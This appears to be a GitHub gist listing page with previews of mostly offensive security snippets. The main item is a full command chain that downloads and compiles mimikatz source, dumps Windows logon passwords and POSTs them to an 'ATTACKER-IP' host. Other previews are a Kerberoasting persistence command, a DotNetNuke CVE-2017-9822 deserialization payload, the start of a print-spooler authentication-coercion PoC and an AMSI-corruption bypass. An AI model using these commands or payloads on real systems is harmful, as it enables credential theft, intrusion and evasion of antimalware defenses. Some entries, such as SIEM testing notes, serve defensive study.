Skip to content

Instantly share code, notes, and snippets.

View AA-2020743's full-sized avatar

AA-2020743

3 followers · 10 following
View GitHub Profile
@vestjoe
vestjoe / persistence.md
Last active August 26, 2019 17:46

Misc persistence techniques

Set User SPN for future kerberoast attacks

Set a SPN on a user account to provide to regain password to account that was changed.

Example

setspn -S MSSQLSvc/myhost.redmond.microsoft.com:1433 redmond\accountname
@dru1d-foofus
dru1d-foofus / commands.txt
Last active April 28, 2022 21:44
SubTee's mimikatz magic
Credits: https://github.com/caseysmithrc and https://github.com/xillwillx
#On attacker machine:
#nc -lkvp 80 >> katz-listener.log
#SSL encrypted traffic
#ncat -lkvp 443 --ssl
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://gist.githubusercontent.com/dru1d-foofus/aa8c6894c2be84bb01b1ddeba492134e/raw/a8e703dcb7af9ea02309c71292931670c2ec63f7/katz.cs','katz.cs'); && c:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && c:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe privilege::debug sekurlsa::logonpasswords > katz.txt exit && powershell -ExecutionPolicy Bypass -noLogo -Command (Invoke-WebRequest -Uri http://ATTACKER-IP/$env:ComputerName -Method POST -InFile katz.txt -TimeoutSec 5); exit && del katz.* && exit
#SSL - encrypted traffic
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebCl
@raandree
raandree / Get-KerberosKeytab.ps1
Last active December 27, 2023 02:33
Parses Kerberos Keytab files
param(
[Parameter(Mandatory)]
[string]$Path
)
#Created by [email protected]
#
#Got keytab structure from http://www.ioplex.com/utilities/keytab.txt
#
# keytab {
@3xocyte
3xocyte / dementor.py
Last active June 18, 2025 09:27
rough PoC to connect to spoolss to elicit machine account authentication
#!/usr/bin/env python
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
# some code from https://www.exploit-db.com/exploits/2879/
import os
import sys
import argparse
import binascii
import ConfigParser
@evanrolfe
evanrolfe / oscp_notes.md
Created October 17, 2018 17:59

Notes

Enumeration

Scan IPs to a CSV file:

cd /mnt/hgfs/Shared/Exam
mkdir hosts
ruby scan.rb tcp 10.11.1.220 10.11.1.221 10.11.1.44 10.11.1.218 10.11.1.219
ruby scan.rb udp 10.11.1.220 10.11.1.221 10.11.1.44 10.11.1.218 10.11.1.219
@7MinSec
7MinSec / SIEMple_SIEM_questionnaire_and_tests.md
Last active March 18, 2024 12:43
Some simple security tests you can run to test the effectiveness of your SIEM

Introduction

In episode 338 of the 7 Minute Security podcast, I talked about a recent engagement where I helped a customer do a bit of a SIEM solution bake-off. This gist is the companion to that episode, and is broken down into the following two sections:

  • Questionnaire - a series of questions you can ask SIEM vendors to gather as many data points about their products and services as possible

  • SIEM tests - a few tests you can conduct on your internal/external network to see if your SIEM solution indeed coughs up alerts on some things it should indeed whine about

Questionnaire

Introduction / Purpose

@pwntester
pwntester / ReadFile.xml
Created October 31, 2018 12:20
DotNetNuke (CVE-2017-9822) Payloads
<profile><item key="name1:key1" type="System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ExpandedElement/><ProjectedProperty0><MethodName>WriteFile</MethodName><MethodParameters><anyType xsi:type="xsd:string">C:/windows/win.ini</anyType></MethodParameters><ObjectInstance xsi:type="FileSystemUtils"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>
@s4vitar
s4vitar / Preparación OSCP.md
Last active June 13, 2025 15:49
@PaulSec
PaulSec / search_apkpure.py
Created November 18, 2018 12:45
APKPure.com search utility
#!/usr/bin/env python
# python search.py -s uber
# https://apkpure.com/search?q=uber
# Name: Uber, (package: com.ubercab), Download: https://apkpure.com/uber/com.ubercab
# Name: Uber Driver, (package: com.ubercab.driver), Download: https://apkpure.com/uber-driver/com.ubercab.driver
# Name: Lyft, (package: me.lyft.android), Download: https://apkpure.com/lyft/me.lyft.android
# Name: Uber Eats: Local Food Delivery, (package: com.ubercab.eats), Download: https://apkpure.com/uber-eats-local-food-delivery/com.ubercab.eats
# Name: Uber Fleet, (package: com.ubercab.fleet), Download: https://apkpure.com/uber-fleet/com.ubercab.fleet
# Name: Free Uber Coupon Code, (package: taxiuber.coupon.code), Download: https://apkpure.com/free-uber-coupon-code/taxiuber.coupon.code
@mattifestation
mattifestation / CorruptCLRGlobal.ps1
Created December 7, 2018 12:45
A PoC function to corrupt the g_amsiContext global variable in clr.dll in .NET Framework Early Access build 3694
function Subvert-CLRAntiMalware {
<#
.SYNOPSIS
A proof-of-concept demonstrating overwriting a global variable that stores a pointer to an antimalware scan interface context structure. This PoC was only built to work with .NET Framework Early Access build 3694.
.DESCRIPTION
clr.dll in .NET Framework Early Access build 3694 has a global variable that stores a pointer to an antimalware scan interface context structure. By reading the pointer at that offset and then overwriting the forst DWORD, the context structure will become corrupted and subsequent scanning calls will fail open.